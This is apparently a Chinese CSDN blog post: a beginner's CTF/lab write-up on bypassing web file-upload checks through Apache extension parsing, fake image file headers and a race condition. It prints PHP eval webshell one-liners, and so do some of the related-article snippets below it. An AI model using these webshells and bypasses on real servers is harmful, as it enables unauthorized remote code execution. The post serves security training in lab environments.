CTF之萌新学习web(文件上传2)

最新推荐文章于 2024-02-15 17:20:41 发布
最新推荐文章于 2024-02-15 17:20:41 发布
阅读量779 收藏 1
点赞数
分类专栏: ctf 文章标签: 信息安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bmth666/article/details/104629058
版权

文件上传2

配合Apache的解析缺陷

Apache的解析漏洞主要特性为Apache是从后面开始检测后缀,按最后一个合法后缀解析
例如:
1.php.owf.rar “.owf"和”.rar"这两种后缀是apache不可识别解析,apache就会把1.php.owf.rar解析成1.php

实验环境:upload-labs:第四关
在这里插入图片描述
黑名单校验,可上传apache无法解析的后缀名,这里上传了xxx.php.xxx内容为:
<?php phpinfo();?>
在这里插入图片描述
试试能不能访问
在这里插入图片描述
成功执行了php语句!!

文件头校验

getimagesize() 函数用于获取图像大小及相关信息,成功返回一个数组,失败则返回 FALSE 并产生一条 E_WARNING 级的错误信息。getimagesize() 函数将测定任何 GIF,JPG,PNG,SWF,SWC,PSD,TIFF,BMP,IFF,JP2,JPX,JB2,JPC,XBM 或 WBMP 图像文件的大小并返回图像的尺寸以及文件类型及图片高度与宽度。
各类文件头
绕过方式:在恶意脚本前加上允许上传的文件头标志
在这里插入图片描述
实验环境:CTFHub-文件头检查
上传php文件发现
在这里插入图片描述
在一句话木马前加入文件头,修改文件类型上传
在这里插入图片描述
发现上传成功,最后连上蚁剑得到flag
在这里插入图片描述
可参考各类文件的文件头标志

竞争上传

文件先通过move_uploaded_file进行保存,然后用in_array判断文件是否为图片类型,如果是就用rename进行重命名,如果不是,则使用unlink删除文件。所以可以利用这个时间差,当文件保存后,就不断访问该文件,使得它又生成一个shell.php,之后即使上传文件已经删除,shell.php仍然存在。
实验环境:upload-labs第17关
<?php fputs(fopen('shell.php','w'),'<?php @eval($_POST["pass"])?>');?>
代码如上,即执行写入shell.php,所以说我们要快速访问文件即可,利用burpsuite
在这里插入图片描述
进入爆破模块,随便找一个无用的参数,设置为变量
在这里插入图片描述
从1到10000次进行上传,同时开始访问上传文件的路径的intruder,就是对/upload/1.php进行无数次访问。然后在buuctf上有限制,访问频率过快,就在本地搭建的靶机下实验。
在这里插入图片描述
为200就是访问成功,生成了shell.php文件,在文件夹看一下
在这里插入图片描述
上传成功,看看能不能执行函数
在这里插入图片描述
这里我有个问题,一句话木马的POST没有大写,后来在文件夹里改的。。。。。。
可以参考大佬做题的记录:简析GXY_CTF “BabyUpload”上传绕过+条件竞争

Bmth
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
web文件
04-17
非常好用的一款上软件。切没用使用期限限制。
BugkuCTF-WEB文件
am_03的博客
09-08 1650
启动场景 发现是文件 只能上图像,不能上PHP文件,那应该是寻找漏洞上PHP文件 PHP文件里写入一句话木马 <?php @eval($_POST[caidao]);?> 使用burp抓包,不断尝试发现发现需要修改的地方有三个: 一个是http head里的Content-Type: multipart/form-data; 请求头部的 Content-Type 内容 随便改个大写字母过滤掉 比如 mulTipart/form-data (其t为大写) Multipart里的部分字母
CTFHub技能树web文件(一)
wzhwzh123321的博客
02-15 1202
使用蚁剑连接,上的.htaccess文件文件名字只能是.htaccess,只能有后缀而不能有文件的名,比如1.htaccess等,在第一次上中我使用了1.htaccess,在后续上jpg格式文件后服务器没有自动将jpg解析为php文件,需要注意。JavaScript会对我们上文件进行限制,允许图片格式上,可以通过上图片马或者使用bp修改一下文件后缀即可,本题使用bp修改文件后缀的方法,先将文件后缀修改为.jpg格式,文件然后抓包。文件目录权限:确保上目录的适当权限设置非常重要。
i春秋-CTF-web文件
在Web和Reverse坑里游泳中。。。。
04-27 1664
前言 本来吧,悄悄摸鱼,想整点啥打发时间,看视频太明显,于是做做题,眉头紧锁,仔细思考,装作工作很难的样子。 这回选择web类型的题目,主要是好久没做了,手有点生,找个简单的文件练练。 打开题目环境发现: 好像是没有什么特别的。 但是往下翻看却是别有洞天。 众所周知,php是后端语言,正常情况下前端是看不到的,也就是说,出题人还是很贴心的(虽然我觉得出题人没那么好心)。 <?php header("Content-Type:text/html; charset=utf.
CTFweb-文件篇1
sanqin_的博客
05-19 598
前端绕过 Content-Type 绕过 .htaccess 绕过
ctf-web入门-文件
whisper921的博客
05-28 3854
Web 151 考点:后端无验证,前端校验 查看源码可以发现只能上png图片 修改为php 写一个php文件一句话木马 可以发现已经成功上 查看上级目录发现可疑文件 查看flag.php文件内容得出flag 得到flag Web 152 考点:绕过前端校验 解题思路: 经过一系列的方法测试上题的解题方法并不适用于本题。直接改前端,后端会校验,文件不合格。那就抓包一下。 将Content-Type内容修改成image/png,重发,发现成...
ctf+web安全+任意文件+任意文件下载
10-08
ctf+web安全+任意文件+任意文件下载
河南省网络安全高校战队联盟CTF训练营-web文件第一期
04-22
河南省网络安全高校战队联盟CTF训练营-web文件第一期 脚本及工具
web-渗透-文件漏洞专题靶场.rar
03-14
本靶场为二十一个关于文件漏洞的环境,从前端绕过、服务器绕过、木马图上绕过、截断绕过、竞争条件等等几乎包含目前所有的文件漏洞类型,刷完即掌握文件漏洞的所有要点。 文件中打包了所需的所有环境...
CTF Web各种题目的解题姿势
07-27
课时2:文件利用 - javascript客户端检查14'16 课时3:文件利用 - MIME类型检查10'50 课时4:文件利用 - 黑名单检查11'46 课时5:白名单检查13'09 课时6:Magic Header检查13'04 课时7:竞争上...
3.18号日报,ctfhub中web文件漏洞题目解法
最新发布
03-18
文件漏洞
CTFweb学习记录 -- 文件
lifanxin的博客
06-21 1310
文件概述一句话木马常见攻击手段JS检测绕过攻击总结 概述   所谓文件漏洞,就是web服务器对上文件没有做好检测和过滤,从而使得恶意用户可以上脚本程序到服务器,进而获得服务器权限。这个恶意脚本文件,又被称为WebShell,因此也可以将WebShell脚本作为一种网页后门,一般通过上的脚本文件,我们可以查看服务器的目录结构和文件,亦或者执行系统命令等。 一句话木马   这里先介绍web服务器没有对上文件进行任何检测的情况下,我们应该如何攻击。   利用一句话木马,即上一句话木马脚本文件
CTFHubWeb文件
qq_45927819的博客
07-27 1384
文章目录无验证前端验证.htaccess方法一方法二MIME绕过文件头检查00截断 无验证 没什么限制,直接一句话木马 <?php @eval($_POST['upload']);?> 提交成功! 并且提示了文件的相对路径,那我们可以直接使用蚁剑或者菜刀连接 打开便可以得到flag! 前端验证 既然是前端js验证,那我们尝试用burpsuite抓包 上题写的一句话木马还可以接着用,但是我们要将他的后缀改成png或者jpg,抓包: forward放包,上成功!提示了文件路径,蚁剑连接
CTFweb文件基础知识
cutesharkl的博客
07-13 918
文件漏洞:文件功能是许多Web应用程序的常见功能之一,但在实施不当的情况下,可能会导致安全漏洞。文件漏洞的出现可能会使攻击者能够上恶意文件,执行远程代码,绕过访问控制等。文件类型验证:Web应用程序通常会对上文件类型进行验证,以确保只允许特定类型的文件。这种验证可以通过检查文件扩展名或内容类型(MIME类型)来实现。然而,这种验证机制往往是不可靠的,因为攻击者可以伪造文件扩展名或篡改内容类型。
CTFshow Web入门 文件
m0_62905261的博客
10-05 723
CTFshow Web入门 文件
web-文件
bingo_csdn的博客
10-29 1839
1、JS检测绕过攻击(客户端JS检测上文件后缀) 将需要上文件名后缀改成允许上的,如png,绕过JS的检测,再抓包,将后缀名修改成可执行文件的后缀 2、文件后缀绕过攻击(限制某些后缀的文件不允许上) 1.php.XXXX,由于后缀xxxx不可以解析,所以向左解析后缀php 1.phtml 1.php空格 3、文件类型绕过攻击(通过Content_type判断文件的类型) 修改Content-Type为允许的类型...
CTF文件(知识点+例题)(1)
qq_53099119的博客
03-23 4597
有的站点会出现仅进行了前端校验的情况(一切在前端做的安全防护,都是耍流氓),由于前端页面的源码是我们可以随意更改的,因此可以通过找到进行过滤的指令,更改成我们想要的功能即可。假设接下来就可以上一个名为1.png的木马文件,植入后门,将其上后,该文件文件后缀名为png,但会被当作php类型的文件进行解析,其中的一句话木马也能够被正常执行。因此,通过使用.user.ini,我们可以任意指定包含一个文件,这个文件可以是我们自己上的木马文件,从而通过该木马文件提供后门来获取当前服务器的webshell。
CTF-中文件(2)
欢迎来到神林的博客
04-18 7263
0x00:二次渲染 今天上午刚刚结束的DDCTF真的是让人脑壳很大,除了膜拜一波大佬之外,还get到了很多的知识: 文件中,大部分题目回绕求我们上图片格式,而我们就会伪造一些图片绕过验证,一些简单的前端验证还有一些服务器端的验证,都是比较简单的,但是有的时候就会涉及到比较困难的知识点,比如今天要说的:二次渲染 所谓二次渲染: 就是根据用户上的图片,生成一个图片,将原始图片删除,将图片...
ctf.showweb8
07-12
3. 文件:检查是否存在可以上任意文件的漏洞,尝试上恶意文件并执行。 4. XSS(跨站脚本攻击):尝试在用户输入中插入恶意脚本,从而获取用户的敏感信息或者执行恶意操作。 当尝试解决 web8 题目时,你可以...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值